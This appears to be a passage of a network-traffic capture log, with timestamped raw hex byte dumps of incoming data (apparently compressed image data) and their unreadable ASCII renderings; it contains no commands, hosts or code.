                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC184INData Raw: f5 33 1a 63 48 87 f5 46 d0 3f 50 72 8b c1 5b 61 5b 69 b7 3b 0e 6e c7 48 cd 0c 95 3d c0 67 ef be b1 a9 e1 f8 82 95 a2 b5 62 1f a6 bc ab 68 b2 3e 9a 9d 4e 32 97 3d d7 97 ba 44 96 e8 0e c9 55 d5 80 04 12 b5 ed 55 ff 00 e2 b0 bf 0b 5d 57 cc 0e 93 de de de be 51 a4 e1 16 c5 24 31 75 24 d6 99 73 a3 9f 28 7f 7a 4f 54 58 d9 c9 95 ed d6 26 92 26 0a ca 17 b4 3d ca a4 05 8d 4b 15 a6 bb 04 35 f5 56 49 54 cc 39 65 d2 fd 9f c0 8d 6f 0a af 0f 79 53 d9 eb 9e 46 1f 3a 16 a9 1a 14 63 da ef a2 06 74 91 41 70 af 4c 64 a1 ec 37 e4 7c d0 3e 7a af e2 52 ea f0 7f 2c f4 77 d7 4d 88 8d 04 a5 d1 a9 67 e8 d6 7f 46 3b 51 e1 a3 a3 e5 18 d2 69 d7 24 18 64 9b 7b 3f 78 77 36 d0 0f 18 8d 88 da 81 c5 92 00 35 e3 f3 d0 12 82 c5 ee 36 ab f2 7d 29 d6 1f 44 c9 4b 18 30 f8 d0 e0 9a 5e fe af e9
                                                                                                                                                                                                                                  Data Ascii: 3cHF?Pr[a[i;nH=gbh>N2=DUU]WQ$1u$s(zOTX&&=K5VIT9eoySF:ctApLd7|>zR,wMgF;Qi$d{?xw656})DK0^
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC185INData Raw: be 43 9c 38 7d 13 22 18 20 9a 2e ec 73 cb 1a 25 3a ab 1a 8b 96 2a 58 30 0c 18 85 2c be 2f c7 1d 2b 38 ad a9 6c 9a cd fa 35 d4 65 11 08 2c 92 59 da a3 56 2e 5f f6 21 ad 8f 10 c9 68 d6 48 c4 d2 08 ce e5 91 18 6d 46 93 71 48 dc 8b 76 5e 37 10 36 8a be 7a 5a 52 88 5b 2f 3a 92 74 7a db 58 8a c2 91 ff 00 20 56 80 d6 ed fd fa e8 0c 6c bc 70 c3 2b a5 1d c6 3b da 10 15 73 b7 86 02 c3 27 23 fe 60 1f 9e 3a 64 2e 52 49 c0 00 26 fb e9 5f 6f 68 18 52 94 53 89 88 53 b6 d9 7b eb a6 91 ad 34 d1 cf db 47 dc 41 87 da ac 45 c7 ce d5 65 24 dd 8f 01 7c 95 16 6f a3 d1 ab 50 e2 87 7d a9 6d f5 86 5c a1 2c 0e 95 72 36 7b e7 f8 d2 31 24 59 18 d9 50 4f 04 b2 b0 60 40 46 2c 51 59 6a 9e d3 6b d5 8a e5 58 1a e6 c5 f5 29 b8 a5 e0 29 cd b3 c8 e7 b5 cd 99 8e 45 e3 a9 12 a7 02 16 01 a3 39
                                                                                                                                                                                                                                  Data Ascii: C8}" .s%:*X0,/+8l5e,YV._!hHmFqHv^76zZR[/:tzX Vlp+;s'#`:d.RI&_ohRSS{4GAEe$|oP}m\,r6{1$YPO`@F,QYjkX))E9
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC187INData Raw: 04 8e 64 71 1c aa d5 43 71 b4 e0 8a f6 58 be ae d1 20 4c 92 a0 f7 1b 3d 0d 5c 1a 87 be 91 43 39 58 56 55 5a 31 1a f7 7e 94 30 5f 93 9f 8f a8 67 e2 4b 24 23 b7 ad 46 e9 8f 36 e0 04 19 56 18 26 d6 3c b1 2a 40 16 3f bd f4 b2 e4 b1 28 c9 ab cf 4a 79 e7 d5 e0 df 7b 02 12 a7 72 58 16 3b e7 fb eb 04 7a f6 17 f8 b6 8d 1e 3c b1 50 c6 89 8f 68 46 c8 c5 d0 a8 75 ed 33 50 63 fb bb 81 b9 53 75 d2 28 57 da 98 13 bd 32 cb 5a 06 f2 8b 65 4a 1c 5f 0e 54 19 d8 96 a5 39 e7 7e eb 00 5a 34 72 e0 4f 9d a6 e6 06 58 cc 71 7d 94 8c 3b 8b 14 aa 3b b1 90 78 2f 0c ca 5a 2d dc 6d fd 86 e8 74 ca d4 54 1f 71 4b e7 91 19 93 cf 94 56 4b 96 65 96 22 cc 1a b9 1d f7 ee 90 5b 8f a8 47 34 0d 0c 8c e9 24 39 08 62 7a 1d b6 82 71 da 95 99 ee f7 2c a1 48 05 68 0d b5 7d 23 30 61 70 01 f7 a1 d9 9c
                                                                                                                                                                                                                                  Data Ascii: dqCqX L=\C9XVUZ1~0_gK$#F6V&<*@?(Jy{rX;z<PhFu3PcSu(W2ZeJ_T9~Z4rOXq};;x/Z-mtTqKVKe"[G4$9bzq,Hh}#0ap
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC188INData Raw: 8d b8 be f7 fb cb 5f 25 48 3b e8 0f 2d ee 17 f3 7d 5c a1 78 d8 01 56 cb 32 2e fb e7 fa 68 ae 9b fc 4f 5f 6f dc 45 65 ca e9 89 a1 19 ae 43 d9 58 cc 65 f6 31 11 4a 71 e4 54 6f 92 51 94 91 f2 39 f9 ea 61 58 96 00 a6 1d 76 a6 5d 7f 2d 0a 2f c6 a9 20 5f 00 77 ca f9 6a 05 79 c0 06 90 c7 45 f5 b6 3e 4c bf a7 1e 26 af 16 e1 21 72 e9 1b 31 50 48 4e 4a 85 28 d6 6e c0 f0 7c 1b 2e 23 fe 5e 0c da 94 1d 34 06 d6 ab 36 e4 45 7c b7 97 c6 82 69 e2 67 a3 bf a6 9a bd 48 a3 47 54 fd 03 aa c2 83 16 e4 44 96 59 01 0f 1f b8 bb 32 87 4f d3 63 4c 94 c0 b0 61 c7 9a f9 eb e7 fc 52 1d 4a 4f 79 bf 99 ca d1 f5 6f a6 ce 1f 65 05 c9 c4 13 57 17 a5 34 cf 2a c3 f7 45 d4 23 33 ad ca cd f6 72 3a 14 21 53 7b 4c 46 e4 8c 02 bc 59 df 62 96 c1 51 f1 55 6b 45 0c bc ef d4 7e cb 5f cd a3 4d c3 71
                                                                                                                                                                                                                                  Data Ascii: _%H;-}\xV2.hO_oEeCXe1JqToQ9aXv]-/ _wjyE>L&!r1PHNJ(n|.#^46E|igHGTDY2OcLaRJOyoeW4*E#3r:!S{LFYbQUkE~_Mq
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC189INData Raw: a9 0c ce 5b ff 00 76 65 87 1b 4c 82 58 d8 23 99 b3 67 74 8d bb ae 2f 7c 6e fe 38 ae 7a d0 f0 1f e9 d9 ab 4a 67 4f 5a 50 29 85 27 5c 8b 0d 2a ef 19 0f a9 7f aa 10 84 fd 9e 1a 41 9a 0a 87 89 20 93 9d 68 09 20 13 71 cc c2 fb d2 ff 00 d7 de 4e a9 9b 88 53 d0 7e a0 d2 5b 2a 65 31 be 46 a5 8f 34 49 b9 87 6d 65 92 36 a1 bb 70 fd 40 5b 69 bb 23 a6 78 df a7 19 49 04 2c 28 4b 0e 52 19 b9 7b 75 8e 7d 3f ea 1c 5c e2 14 53 82 51 2e a4 a8 10 58 e4 c4 0f 8e 51 d1 0f 48 ff 00 51 da a6 ad a3 e3 c9 71 a9 92 38 dd d4 07 94 c6 d5 ca b3 86 01 b6 ee e5 c0 20 fe 49 e3 aa 09 a8 2f 4d e8 37 f4 be 55 8b d4 cc 5a 94 08 14 a3 b1 22 bd 79 73 19 c3 7b e9 b7 a8 b2 fd 7b ea ec 7d 36 37 49 dd 82 64 e5 23 06 ed c5 8b 09 0e e2 43 7b 91 ad 69 76 9d db b9 20 f4 92 e5 1f dd 8f 50 62 fa 5c f5
                                                                                                                                                                                                                                  Data Ascii: [veLX#gt/|n8zJgOZP)'\*A h qNS~[*e1F4Ime6p@[i#xI,(KR{u}?\SQ.XQHQq8 I/M7UZ"ys{{}67Id#C{iv Pb\
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC190INData Raw: 2c 53 ee 25 94 05 76 5f 01 9a f8 e2 cf 3d 4f ea 0a 72 71 5c a9 b4 3f 9c fc ef 58 53 83 9a 11 29 94 4b 95 b6 b4 7f 8f 28 b8 3f 4b b5 9c 94 f4 74 b8 33 bc 92 e6 69 de a2 fb 50 8e d5 b7 d3 da dc 5d cf ba 37 40 76 b5 38 24 11 35 9d 8c 4a 0a dd d6 77 8f 90 93 27 18 fe 55 bd 4e a1 fa 67 ca 35 5c 0f 10 b4 cd 08 03 c1 81 27 cc 55 f9 b5 bd cc 79 fa 97 a1 fd ab e9 be a4 47 44 92 55 97 4f cb 7e 03 77 3d a7 72 ff 00 fe 78 42 b9 17 c3 0f 1c f4 9f d2 b8 83 f7 26 4b 5d 45 19 fc 9b 3c c0 fe a2 7c 7c b6 18 f7 34 d1 9a b6 d3 ca 11 9e a3 82 34 87 22 19 18 bf df e9 91 e3 03 b0 32 09 52 66 d8 48 ab a9 15 d7 91 7e 39 eb 45 c2 ac a5 04 0f fb b7 a5 4f 2e ce 91 43 c5 8a a6 62 68 30 e5 61 ce df d1 19 1a ac a6 c4 86 5d 22 1e c1 d9 95 a3 2b 62 e5 6f 0c 3d ab 22 fb 6b 9d d5 13 ee 47
                                                                                                                                                                                                                                  Data Ascii: ,S%v_=Orq\?XS)K(?Kt3iP]7@v8$5Jw'UNg5\'UyGDUO~w=rxB&K]E<||44"2RfH~9EO.Cbh0a]"+bo="kG
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC192INData Raw: a5 1a 36 99 02 cb 24 9a ae ab 2d 7b 17 72 3c 40 a3 49 32 50 2b 11 0b 20 0a 46 d5 f6 90 6f 9e ab 08 7e 29 67 13 24 81 4c a8 2c 2a dc fa 45 bc 94 ff 00 c6 02 aa 5d fd 7c fe 62 03 d6 1a 94 33 fa 63 4a c8 f7 17 c2 ce cd 82 69 28 9d b8 dd 90 88 8b e3 70 05 15 b7 10 7c 8f 83 cc 93 28 19 8e 08 0c 41 1d 77 f4 3a 44 16 a1 84 b8 7d 0d 99 87 6c 35 b3 e4 b7 d1 8c f9 ba 73 e5 cf 30 ca 4c 4c 8c 49 9d 81 06 58 c0 66 89 56 42 09 e3 63 a7 f1 6a 07 e3 a6 54 bc 0b f1 25 c8 b1 b3 72 a3 03 eb e5 10 4a 31 a7 f9 11 72 d9 10 00 f9 35 c9 a8 f1 31 a0 54 7e af d5 27 fd 23 8d a9 e2 7d ab f7 1e 9f ee e4 c1 72 24 45 fd 8c c0 40 a0 8f 3c 8f 9a ea 6b 0b 5a 31 e3 2e 3c 40 0c aa 05 8f 2e 82 f9 40 dd 32 89 4e 11 e2 bb 50 33 6f cf 9c 25 35 1c 63 22 fa 87 1e 7a ee bc ef 93 8e c0 0d e8 71 98
                                                                                                                                                                                                                                  Data Ascii: 6$-{r<@I2P+ Fo~)g$L,*E]|b3cJi(p|(Aw:D}l5s0LLIXfVBcjT%rJ1r51T~'#}r$E@<kZ1.<@.@2NP3o%5c"zq
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC193INData Raw: 54 e4 90 42 5d 57 27 3a bb b1 cf de c2 23 c3 ce e2 38 15 09 8e af 01 05 81 26 a6 8e d4 19 d0 b5 44 74 4b e8 b7 d6 18 73 20 8b 58 d0 f3 32 31 e4 59 23 fb ec 32 0c 32 e3 4a 96 25 0c b6 5e 6c 72 c0 ec 94 03 1e da 23 93 d6 4b ea 7f 48 6a a5 2e 82 e2 83 57 17 36 bd 79 82 ef 1f 41 fa 37 d7 02 e5 80 56 52 a0 d9 b3 fe a9 5d 0f 3a 5d 3c 3f ea 6e 18 31 e1 33 17 96 78 e2 56 59 11 b6 8b 36 bb 57 76 d2 37 dd 33 50 a1 e7 cf 59 ff 00 fe d0 b4 35 c1 c9 a9 b9 6a 6b bd 23 5b 2f eb d3 52 19 b1 75 15 de 9d d2 0c 74 df ea 4e 1c c3 8c a4 e4 ac fb 91 5b bb 2a 32 00 e4 2a 1a 0e f6 2c ed 03 68 3e 2f f3 d2 eb fa 7a aa 0a 6a 3a 3f 3e 7d b4 59 a7 ea ce 90 a2 a6 24 07 48 df b1 f8 d3 d7 d4 0f ea 06 0c 0d 02 4c 89 32 1d 71 e1 47 79 99 58 6f e3 ca 47 4d 52 49 7f b5 45 f9 e4 f1 7d 4f 87
                                                                                                                                                                                                                                  Data Ascii: TB]W':#8&DtKs X21Y#22J%^lr#KHj.W6yA7VR]:]<?n13xVY6Wv73PY5jk#[/RutN[*2*,h>/zj:?>}Y$HL2qGyXoGMRIE}O
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC194INData Raw: 21 18 b8 31 bf ed 78 d8 28 52 d5 cf 17 77 e2 c8 1d 0c 27 11 f7 7a e6 ff 00 d7 bd a0 4b 58 2d 86 9c bb 17 d2 16 7a d6 bd 08 c9 7b 68 d9 ad e0 11 c6 4b 5b 46 ac 50 be ee 12 fc b7 85 a1 cf e0 94 a2 80 21 36 d2 ed bc 40 4c 01 24 17 70 f5 e6 68 e7 5a e4 3f 4a 7d 53 37 22 56 91 a5 64 48 9a a6 8d dd 44 77 62 9b 6e df dc 03 fb 57 fe a0 a2 ff 00 1d 1a 5a 5c a4 b0 4b 53 a9 ef d3 48 a7 e2 97 8b 18 2a 7a 30 26 ec f9 1e ba f2 85 06 af 03 e4 cb 31 92 50 31 fb cd 1b d9 3b b6 b5 30 28 8b fb 09 a6 a0 2c 7c f1 77 d5 b4 a2 9c 24 37 f8 ea cd 5d b5 8c 8f 16 80 93 42 0b a8 d3 98 d3 d2 a1 e2 b5 fd 54 c4 61 a3 eb 2a a5 94 36 2c e2 27 93 85 08 53 d8 68 fe e1 e7 e7 fb 8e ac b8 14 bc d4 94 d8 d1 c5 ed ae 5f a8 ca fd 44 90 89 80 12 12 42 a8 e7 bf 2f 5b c7 22 fe a1 64 24 5a ae 5a 99
                                                                                                                                                                                                                                  Data Ascii: !1x(Rw'zKX-z{hK[FP!6@L$phZ?J}S7"VdHDwbnWZ\KSH*z0&1P1;0(,|w$7]BTa*6,'Sh_DB/["d$ZZ
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC195INData Raw: de ef ff 00 57 43 52 29 4a f7 7c a2 45 09 51 26 c4 e9 4b f7 de 79 f1 b6 a4 6e cc db b6 ae fd 94 09 f2 55 7c 0f 17 44 8a b1 e7 f8 ea 2a 48 0d c8 1a d5 8e 6d a7 c6 f1 2c 2b 40 a0 4b 1a 39 15 f3 19 b7 76 80 44 cc cc f5 1e ab 24 68 c8 74 bd 35 f6 1b 52 ad 95 94 09 2d 29 24 7b a2 8b c4 7e 49 3c 57 46 48 08 b7 ad 45 9a d9 74 85 8c b3 fe 41 92 34 23 ad 2d dd 63 f6 bd 34 d3 c7 2e 06 31 3b 63 da 93 11 64 04 db 7b 09 e2 94 f9 27 f3 e7 a1 80 16 e4 dc d0 b6 9d bc 10 90 52 02 41 64 d0 93 5a f9 ef ed ac 54 5f ea 23 57 8f 47 d3 e0 d3 70 89 55 82 25 69 f6 b0 71 b8 a0 2b 60 d9 3f 9a e0 74 97 14 9a 06 15 c6 df dd 9b 9f 28 77 84 25 d3 40 c7 c3 5b 9b 33 5c 0e 67 3e 91 cd e6 d4 0e a7 ea 88 91 22 67 68 66 8a 5c 88 dd 5a 9d 4b 02 ea bb 6d 57 72 9b b3 f2 6b 8f 95 56 44 b9 65 5e
                                                                                                                                                                                                                                  Data Ascii: WCR)J|EQ&KynU|D*Hm,+@K9vD$ht5R-)${~I<WFHEtA4#-c4.1;cd{'RAdZT_#WGpU%iq+`?t(w%@[3\g>"ghf\ZKmWrkVDe^
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC197INData Raw: 0c ad f3 58 b2 4f 14 9c 3e 35 30 60 cc c0 12 58 17 ad b5 89 05 d6 55 e5 42 1a 9a 26 91 24 e4 31 75 62 1c 3d 35 7b af 84 aa a0 4f 9a e9 69 87 08 24 52 81 f3 d1 df bd f4 8f 1e 25 cb 02 d5 d6 dd 5f 6a e9 ce fe 32 b5 d8 2b b5 22 bb bc a1 d6 47 ee 90 23 29 e2 a8 d5 7b 7c 5f 9b e7 8e 92 52 fd c5 7f 5c cf e6 0e 85 25 43 11 2d d5 b5 ad 6b c9 a2 02 6d 5c 4e d3 a8 29 18 21 51 1f 7a bc 91 9e de f4 75 1e 37 71 40 59 24 f1 7f 3d 72 ab ca dd e6 60 df ee 25 89 64 13 e2 27 37 b5 28 1c 6a 2e d6 e6 d1 04 c9 93 92 db d9 1e 8f 6f 88 89 2c 0e dd ae ce ef c1 53 fb b7 8b 22 f6 ed 00 59 7e 40 c0 1a 8e d5 70 ec 4d ed 4f 3c da f0 ac d9 a8 29 64 97 26 a5 ea 29 56 16 bd ba 44 4e ab a1 0c 88 e6 90 ad ee 25 51 18 d8 41 b4 1a 76 0b b3 cd d1 3c b3 50 15 d5 c7 0d 35 12 d2 03 90 2b f3 b7
                                                                                                                                                                                                                                  Data Ascii: XO>50`XUB&$1ub=5{Oi$R%_j2+"G#){|_R\%C-km\N)!Qzu7q@Y$=r`%d'7(j.o,S"Y~@pMO<)d&)VDN%QAv<P5+
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC198INData Raw: 9b 7b aa ee ef db 24 10 08 0b 44 15 ed a9 34 e6 4f 9a f8 bb be 7a 74 ad 25 01 49 35 23 98 f4 d3 fa 81 4c 2a 4b 67 93 9f 4b 36 fd 5e b1 24 b9 f3 c9 11 67 95 53 ba ca e7 b4 50 48 8b 60 95 28 3c 6d a1 67 86 e4 df 8e 82 26 15 50 91 b0 14 a3 0f 97 89 a0 16 2b 0d 50 e5 eb 76 b5 aa d5 bf 96 5a f9 a0 c8 46 dc b5 60 1c c9 64 03 ec 70 2c 89 17 f0 45 50 fc f3 e4 5f 95 60 52 1c 8b 83 d2 a3 bd a2 78 d0 55 42 5c 17 ce b9 56 a7 30 fd 6b a4 0e 4b 2b 09 6c 8d 85 6d 59 89 0a 5e 83 53 7b 4f 2b c9 a1 43 dd 5c d7 51 09 52 8b 30 14 3a 73 ef ac 38 82 92 01 38 9f 26 b5 f3 ea f6 1c b7 86 9b 58 81 25 78 d7 21 cb 2f 75 9c b4 6e 0a fe 96 ed 94 00 dc d5 54 b5 42 ef f1 d0 81 4a 56 c4 d5 fd 72 d2 9e b0 59 ab 6c 01 f3 4f bd ce 9a f9 e6 e2 00 f5 3d 5b 13 21 de 19 82 83 28 45 14 1d 1d 99
                                                                                                                                                                                                                                  Data Ascii: {$D4Ozt%I5#L*KgK6^$gSPH`(<mg&P+PvZF`dp,EP_`RxUB\V0kK+lmY^S{O+C\QR0:s88&X%x!/unTBJVrYlO=[!(E
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC199INData Raw: 91 c7 16 0e 3e 0d 46 61 c9 8f 25 30 c9 5b 91 e1 68 4c 98 b2 4b 57 52 45 2c 7b 55 f9 2c 68 f5 29 53 14 27 16 6a 82 f4 7d 09 a7 5f 6d 60 66 5e 29 6e 2a 5c 6e c2 bf a8 88 f4 fc f2 26 36 11 93 21 a4 29 94 32 06 c7 65 6d 8a a8 a4 11 c5 49 11 12 59 37 c5 8a e8 b3 02 92 a4 9c dd db 2c dd c7 9d f6 8e a5 4c 18 f3 a3 16 6a f3 be bb 1a 43 ba 1d 37 b3 3b 62 c4 1a 46 59 96 67 85 a5 8a 68 e2 ef c0 66 87 33 19 d3 ff 00 81 3a 4b db 9d 0d 76 67 53 c1 04 f4 a2 d4 52 ac 4b 67 6b 27 99 a6 75 fe e1 99 68 fb 81 ec 3b e7 1b 98 0a b3 b3 89 a4 68 a5 31 42 65 55 7d c3 b9 18 28 7d db 7c fb ac d0 f9 f3 7d 4e 5a ca 81 c2 e7 5b 1f 6f c6 90 19 80 a4 dc 83 6b f5 7e ba be 91 fd 01 c2 fb 97 60 f7 6e f2 c3 8d bf c7 93 44 78 e3 fd 3a d1 07 0c 5b ca d5 dd bf b8 c2 e1 28 f1 03 51 b6 b4 8d e8
                                                                                                                                                                                                                                  Data Ascii: >Fa%0[hLKWRE,{U,h)S'j}_m`f^)n*\n&6!)2emIY7,LjC7;bFYghf3:KvgSRKgk'uh;h1BeU}(}|}NZ[ok~`nDx:[(Q
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC201INData Raw: 13 18 df 1c 09 d7 da b1 97 0d 2e c9 14 b5 0b 85 5c fb 17 d8 db af 80 68 2f ba c7 4a 4e 42 57 43 72 2f a6 ed 9f 9c 58 ca 98 a0 84 ea 9b d7 36 be 83 4c de d0 f6 f4 cf a8 64 85 df 1e 08 29 04 61 c4 8c cb ca 33 d3 10 f5 4a 17 75 b6 de 7e 7c df 4a 4d 46 09 77 a0 da d4 61 72 69 e7 a5 ad 6f 26 62 92 9c 58 af 95 5b 77 ae 9a eb 0e dd 07 59 32 36 24 8f 0c 42 48 25 d9 10 66 01 18 23 02 b1 39 66 dc 52 86 f5 37 ee b6 e3 91 d5 64 f9 68 02 89 e7 60 f7 27 26 6f 5a 36 91 a6 e1 38 a4 a4 a5 04 92 e9 0e 72 ed f2 14 17 ca 1e 7a 0f a8 33 37 4e ce b4 dd c1 18 c8 a6 54 1d c0 08 28 80 51 58 9b 9d c7 fc bc df 55 d3 50 c0 16 60 45 ef af ed 98 df d6 ea 54 e1 88 61 f1 0b 37 be dc b7 bc 32 f0 f5 69 e3 c7 25 66 41 34 b1 a3 83 93 30 21 81 52 26 52 28 18 d5 b8 36 48 e3 90 2c d7 55 93 c8
                                                                                                                                                                                                                                  Data Ascii: .\h/JNBWCr/X6Ld)a3Ju~|JMFwario&bX[wY26$BH%f#9fR7dh`'&oZ68rz37NT(QXUP`ETa72i%fA40!R&R(6H,U
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC202INData Raw: 26 59 d9 76 05 93 73 c7 bb 6a 94 0d ff 00 2c 9b f2 7c 02 6e eb 9a bb e8 48 38 89 98 41 01 ca 58 df c3 72 fd 74 f3 30 4e 22 5a 50 02 10 45 43 bf 3a db 98 bd cf 28 d9 9a 4d b3 f7 63 56 1b c3 47 33 1f 7d 9b b4 0a 0f ed 45 f0 1b 68 1e 6a fa 8a ca 42 93 84 5e f9 f2 1b 5d f2 61 0b a0 2c ba 66 3b 0a 25 c1 d2 a4 07 ca 95 ad 9e d1 a7 99 03 4c d2 2c b2 29 8a 33 e3 f7 7b b9 e3 ff 00 0a d1 e2 b8 ae 3e 3a 11 50 2a 28 22 c0 97 dd 9f 7d 73 7c a8 5e 14 9a 70 2b a5 c5 39 6f 5e ad 09 df 53 69 73 41 de 6c 28 cb a9 52 7b 6a df f3 04 65 8d 39 0a 6c f3 b8 78 3f 0b d2 93 31 39 6b e5 de 5e 51 e9 53 bc 48 7d 45 5e bb bf b6 4f bc 22 33 a2 96 1c 82 ee 99 14 6e 92 45 ed 16 57 f7 8d c4 d0 66 53 e0 1f c5 75 d4 2b 0f f3 0c cd 7f ea 8e 6f e7 17 28 98 83 2d c2 c2 b4 14 71 ee 6e dd 3d 22
                                                                                                                                                                                                                                  Data Ascii: &Yvsj,|nH8AXrt0N"ZPEC:(McVG3}EhjB^]a,f;%L,)3{>:P*("}s|^p+9o^SisAl(R{je9lx?19k^QSH}E^O"3nEWfSu+o(-qn="
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC203INData Raw: 02 e9 7d ad ca da 46 a1 8b 18 fb de e9 01 17 fe 25 7b 05 18 ee f7 f0 3c 55 97 0c b0 26 39 2f b5 9e bc df 3f 2a 52 f1 4f 3d 26 8a 09 28 7c 8b 90 1f 76 ea da 9e 90 bf d0 a4 d9 1a a3 76 cb 42 4c 13 e2 49 6b 23 34 43 60 1b 4f b5 7d bc b2 90 37 6d 04 73 cf 53 e2 93 ff 00 28 22 82 87 5a bf e2 23 21 58 69 7a 03 9b b7 2b 7c c1 77 df 34 51 45 9d 8d 34 13 3e 9a a8 d2 44 37 33 b6 13 f7 14 27 b9 8a b1 82 5d e8 a8 40 a5 71 60 78 e9 65 1c 44 a4 dc e9 e6 f5 6f 47 87 92 a0 90 54 0d 19 c0 19 e6 e3 be 70 41 e8 ff 00 58 e2 7a 6e 49 7b ba 6a 64 69 1a da b4 6a af 22 a9 83 1f 3a 56 59 bb 48 a0 ff 00 c4 e2 3b 3c 88 6c 50 08 28 29 e2 bf 8c 94 14 87 0d 8c 39 c4 d9 0a 57 f1 67 6c e1 ee 03 8b 52 d5 85 49 64 83 a8 67 1e ef e5 93 98 32 f5 26 86 a9 89 78 d9 d0 e7 42 b2 2c f0 cd 01 0e
                                                                                                                                                                                                                                  Data Ascii: }F%{<U&9/?*RO=&(|vvBLIk#4C`O}7msS("Z#!Xiz+|w4QE4>D73']@q`xeDoGTpAXznI{jdij":VYH;<lP()9WglRIdg2&xB,
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC204INData Raw: fe 02 ff 00 e5 6a f7 de 4f 08 af 53 40 8d 9b 01 74 29 57 03 b1 3b 2c 94 32 2b 10 7c 83 e3 8f c8 fe 7a b2 e1 56 02 58 d6 f6 2e 19 af 6d 46 c3 28 a9 e3 65 d5 cb 67 5b 90 29 d7 fb f2 82 ca c7 33 fa 6b 4b ef 45 ef 83 27 28 62 4e 28 00 3b eb 29 5d 9c ed b3 b9 6f c9 ae 5b f0 f7 0e b0 26 28 97 00 97 03 3d 35 61 7b fa 5d eb 94 07 db 21 5c 87 26 bb 7a d8 6b 9d 57 fa 94 8f 26 56 44 0e 03 05 8f b8 be 09 66 49 4b 10 2a 89 22 e8 81 fd bc 78 7c 94 a5 18 85 c9 3a d7 9f 60 33 c2 18 70 e2 49 04 82 4a 83 3b d6 da 10 3c bd 61 93 f4 ab 34 61 ea f9 fa 6c 68 a7 fc 53 06 2d 42 18 98 2d 16 85 82 4f 1b 6e 37 fa 6e a0 fb 08 fd c0 74 2e 36 5a 97 21 2a c8 3d 5d c9 05 bd f2 d0 58 b8 89 70 33 7e df 16 08 27 0b 69 73 56 27 9c 5b 3c 58 4c fa 66 d6 49 81 93 70 1d a8 d4 85 06 bd e7 cf c8
                                                                                                                                                                                                                                  Data Ascii: jOS@t)W;,2+|zVX.mF(eg[)3kKE'(bN(;)]o[&(=5a{]!\&zkW&VDfIK*"x|:`3pIJ;<a4alhS-B-On7nt.6Z!*=]Xp3~'isV'[<XLfIp
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC206INData Raw: fb 8f 00 90 de 3a 59 44 a8 d2 85 c1 34 2c df 3e 7e d0 b4 ee 26 8e 1d 4f b6 bf 9d ab 9c 12 8d 15 63 58 d3 b4 a2 54 b6 e1 49 ee 8f f2 97 2c 4e d6 b1 60 d8 25 be 3c 0e b8 52 09 4a b3 4d bb ef ac 2c 9e 21 56 20 b2 9a a1 36 6f cf 7b 79 18 92 63 8e e8 dd b5 58 06 82 86 e5 01 8b 90 4d fe e9 14 13 c7 8f 1e 45 74 09 a1 60 d3 9d db cc f7 ed 0e 25 48 29 a1 f1 11 66 e7 4c eb 4d 2d 57 8d 96 95 15 22 98 aa 2f 7f 6a b0 a3 b8 6d 34 14 51 e5 c9 ab 66 e2 81 e7 e7 a0 19 8e 92 6c 33 61 9d ff 00 af 58 94 b4 61 1e 2a 1a ef db c6 e3 ab c8 85 49 0b b6 a3 61 b9 76 34 61 19 9c 99 01 02 82 90 5d 40 35 ed e4 fc 19 04 14 86 ff 00 a8 a6 7d 45 ef eb 13 96 a4 a5 4a 2a 2d 52 d4 3b d6 9e 51 a9 1a 08 a3 8f 70 5e dc fc ae d5 a7 14 78 1e c6 b0 0f e7 92 7c 1a ba ea 0b 51 96 18 7f 03 50 40 2e
                                                                                                                                                                                                                                  Data Ascii: :YD4,>~&OcXTI,N`%<RJM,!V 6o{ycXMEt`%H)fLM-W"/jm4Qfl3aXa*Iav4a]@5}EJ*-R;Qp^x|QP@.
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC207INData Raw: 79 49 b5 29 df f5 dd a1 8c 00 df bb d8 41 6f fa 8d d7 e3 a3 f0 20 05 ca 49 23 c3 72 68 d9 bb 1e eb d2 05 c4 0f 0c c2 ce 08 20 1d c0 23 47 e4 f5 ae 50 ab f4 06 5c b8 5e a8 8f 0f b8 4b 4c 64 87 7e f6 87 8a 06 36 04 fe c6 2e 02 b1 e6 be 7f 9b 2e 36 48 9a 95 a9 15 66 15 0d b9 de bb 6d 09 fd 3a 7a d0 ac 0a 24 31 d3 27 eb 77 f8 8b 89 a7 ba 65 65 f6 64 da 7f c4 34 94 59 f7 b0 75 4c 88 c1 8c 29 96 c9 70 68 ee 2c 3f 77 9e 7a c9 cd 41 45 5d 88 57 95 c6 91 a8 c4 26 8c 29 2e a6 de b4 3d f6 62 a6 fa a8 3f f8 ae ab a5 21 1d d8 e4 19 38 d1 dd 24 86 16 68 a4 d9 bb 95 26 26 26 a8 0b 00 9f 3d 68 f8 12 7e d2 49 fe 2a 7a 81 57 3a f3 7d 39 46 7b 8e 48 fb aa 4f f9 8f d6 66 96 6d aa f0 37 0e a7 85 59 9a 66 5c b9 18 b0 0d 2d ce 5b 40 d7 3b 48 47 72 15 ed b5 2b 24 72 2c 2c cd 64
                                                                                                                                                                                                                                  Data Ascii: yI)Ao I#rh #GP\^KLd~6..6Hfm:z$1'weed4YuL)ph,?wzAE]W&).=b?!8$h&&&=h~I*zW:}9F{HOfm7Yf\-[@;HGr+$r,,d
